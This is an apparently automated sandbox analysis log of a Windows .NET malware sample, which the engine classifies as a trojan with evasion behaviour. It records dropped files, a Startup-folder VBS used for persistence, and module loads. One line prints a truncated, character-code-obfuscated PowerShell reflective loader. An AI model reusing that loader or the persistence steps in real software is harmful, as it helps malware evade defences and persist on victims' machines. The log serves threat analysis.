                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exeBinary or memory string: OriginalFilenameKaxhwswfup.exe6 vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@14/16@495/100
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,7_2_0000000140002D4C
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Code function: 3_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,3_2_004011AD
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Code function: 3_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,3_2_004017A5
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3228:120:WilError_03
                      Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
                      Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
                      Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
                      Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeFile created: C:\Users\user\AppData\Local\Temp\$77a3a3b4Jump to behavior
                      Source: C:\Windows\System32\lsass.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs"
                      Source: vm6XYZzWOd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: vm6XYZzWOd.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: vm6XYZzWOd.exeReversingLabs: Detection: 47%
                      Source: vm6XYZzWOd.exeVirustotal: Detection: 37%
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeFile read: C:\Users\user\Desktop\vm6XYZzWOd.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\vm6XYZzWOd.exe "C:\Users\user\Desktop\vm6XYZzWOd.exe"
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess created: C:\Users\user\AppData\Local\Temp\$77a3a3b4 "C:\Users\user\AppData\Local\Temp\$77a3a3b4"
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess created: C:\Users\user\AppData\Local\Temp\$778e373e "C:\Users\user\AppData\Local\Temp\$778e373e"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a7581e3a-9da7-4299-b4e9-0d87c1c78a48}
                      Source: C:\Windows\System32\lsass.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe "C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe"
                      Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess created: C:\Users\user\AppData\Local\Temp\$77a3a3b4 "C:\Users\user\AppData\Local\Temp\$77a3a3b4"Jump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess created: C:\Users\user\AppData\Local\Temp\$778e373e "C:\Users\user\AppData\Local\Temp\$778e373e"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a7581e3a-9da7-4299-b4e9-0d87c1c78a48}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe "C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Section loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Section loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Section loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Section loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Section loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Section loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Section loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Section loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Section loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Section loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Section loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: pdh.dll
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: vm6XYZzWOd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: vm6XYZzWOd.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: vm6XYZzWOd.exeStatic file information: File size 4720128 > 1048576
                      Source: vm6XYZzWOd.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x47fc00
                      Source: vm6XYZzWOd.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000011.00000000.2381194238.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3566674758.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000011.00000000.2381194238.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3566674758.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: vm6XYZzWOd.exe, 00000000.00000002.2336961544.0000000007780000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006BAD000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2765221836.0000000004770000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmp
